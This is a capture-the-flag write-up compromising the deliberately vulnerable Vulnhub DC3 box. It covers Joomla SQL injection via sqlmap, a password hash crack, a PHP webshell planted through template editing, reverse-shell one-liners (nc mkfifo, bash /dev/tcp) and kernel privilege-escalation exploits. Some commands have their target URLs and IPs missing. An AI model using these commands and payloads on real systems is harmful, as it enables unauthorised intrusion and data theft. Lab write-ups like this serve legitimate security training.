[Vulnhub target series] DC3

essential information



Experimental process

Similarly, first find out the IP address of DC3 through arpscan scanning


sudo arp‐scan ‐‐interface eth0



It can be seen directly here that the IP address of DC3 is

Then we use nmap to scan the target

It is found that the target host only has port 80 open


Then we look at port 80. Through wappalyzer, we find that Joomla is used

At the same time, the home page also gives us a hint, indicating that the target has only one flag

Here we use joomscan special scanner to get more detailed information of the web page

joomscan: https://github.com/OWASP/joomscan

perl joomscan.pl ‐u

You can see the detailed version number and background management of joomla


We can check whether there is an EXP available through searchsploit

searchsploit joomla 3.7

You can see that there is an SQL injection vulnerability

searchsploit ‐x php/webapps/42033.txt

sqlmap -u "[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

The next step is to export the account and password of admin. Just put the final result diagram. The statement of the attack process is as follows:

sqlmap -u "[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomaladb --tables

sqlmap -u "
option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" ‐‐risk=3 ‐‐
level=5 ‐‐random‐agent ‐p list[fullordering] ‐D joomladb ‐T "#__users" ‐‐columns

sqlmap ‐u "
option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" ‐‐risk=3 ‐‐
level=5 ‐‐random‐agent ‐p list[fullordering] ‐D joomladb ‐T "#__users" ‐C "username,password" ‐‐dump

We use john to crack the HASH value of password

The decrypted result is snoopy

We tried to log in and found that it was the correct account password


account number: admin password: snoopy

After entering the background, we should find a way to upload a sentence Trojan horse. Baidu can edit the template to upload a webshell

Edit Beez3 template here

Here I created a file named DFZ. html in the html directory webshell for PHP

Then we visit the webshell. If no 404 appears, it means the upload is successful


Next, use the ant sword to link

We use nc on Kali and bounce a shell through ant sword

We now set up a monitor on Kali

It was found that there was a python environment on DC3. I tried to play the shell with Python, but there was no response on Kali

Then try to use bash to play the shell, but it won't work

Attempt to use nc rebound succeeded


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh ‐i 2>&1|nc 2222 >/tmp/f

Then use python to improve the shell environment

python ‐c "import pty;pty.spawn('/bin/bash')"


Get the Linux version. You can see that it is Ubuntu 16.04

Let's find out if there are any right raising Exps that can be used. There are several through searchsploit

Here we use the following EXP to try to raise the right


Linux Kernel 4.4.x (Ubuntu 16.04) ‐ 'double‐fdput()' bpf(BPF_PROG_LOAD) PrivilegeEscalation                                               | linux/local/39772.txt

We open the introduction of this EXP and download it from the designated website



Upload to the target through the ant sword

Then the next step is to decompress, compile and execute EXP to obtain root permission. All commands are as follows

unzip 39772.zipcd 39772tar ‐xvf exploit.tar




Get flag


Additional supplement

Rebound shell with php


system("bash ‐c 'bash ‐i >& /dev/tcp/ 0>&1'");

system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh ‐i 2>&1|nc 2222>/tmp/f');




Use Linux exploit suggestion to assist in raising rights

Download address: https://github.com/mzet-/linux-exploit-suggester

Upload to / tmp and execute weighted


chmod +x linux‐exploit‐suggester.sh



Try CVE-2016-5195 here

EXP address: https://github.com/gbonacini/CVE-2016-5195

After downloading, upload it through ant sword and unzip it

After entering the directory, you can get the dcow file under make and execute it/ dcow -s attempts to raise rights

Then the target crashed, indicating that this EXP is not suitable

Added by zvonko on Fri, 18 Feb 2022 01:01:47 +0200